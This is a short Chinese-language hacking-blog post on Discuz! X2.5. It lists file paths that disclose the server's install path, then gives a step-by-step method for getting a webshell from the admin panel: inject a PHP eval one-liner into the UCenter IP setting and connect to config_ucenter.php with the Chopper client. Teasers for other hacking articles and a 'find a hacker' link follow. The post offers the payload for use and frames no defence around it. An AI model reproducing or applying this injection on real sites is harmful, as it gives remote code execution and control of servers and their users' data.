discuz! x2.5爆路径漏洞及后台拿shell

hacker5年前 (2020-05-31)黑客文章1851

爆路径文件如下:

/uc_server/control/admin/db.php
/source/plugin/myrepeats/table/table_myrepeats.php
/install/include/install_lang.php

后台拿shell

需要有管理员帐号及密码，进入后台打开站长—-ucenter设置，直接在UCenter IP 地址:里面插入一句话

xxoo\\’);eval($_POST[a])?>;//

就ok ，然后菜刀连接 http://chnctocom/config/config_ucenter.php 密码a

标签: 黑客技术

返回列表

什么叫Wifiphisher？ Wifiphisher是一种WiFi黑客工具，能够对无线网络/ WiFi互联网实行迅速的全自动互联网中间人攻击，目地是发觉客户和登陆密码凭证。与无线网...

公共互联网威胁的定量评估。微信公共互联网威胁量化是一项为企业提供实时、客观的网络安全风险量化风险评估服务。通过微信小程序，可以直观地呈现企业网络安全指标、安全等级、详细安全问题等信息。它不仅反映了...

本文介绍一个用C语言和网络数据包分析开发工具实现的简易网络Sniffer。目前，已经有不少的Sniff工具软件，如Windows环境下，最富盛名的工具是Netxray和Sniffer pro，用它们在...

这两天给360做了一个webscan360的总结，结果补丁还没有出来，就被人公布到了91org上面，既然公开了，那我就做一个总结首先我们贴上它最新的防御正则 \<.+javascr...

Wireshark是一款十分时兴的网络抓包分析系统,作用十分强劲。能够提取各种各样互联网封包,显示信息互联网封包的详细资料。wireshark是十分时兴的互联网封包分析系统,作用十分强劲。应用wir...

分享一些关于Fckeditor漏洞利用总结 1.查看编辑器版本 FCKeditor/_whatsnew.html ———————————————————————————————————...

找黑客平台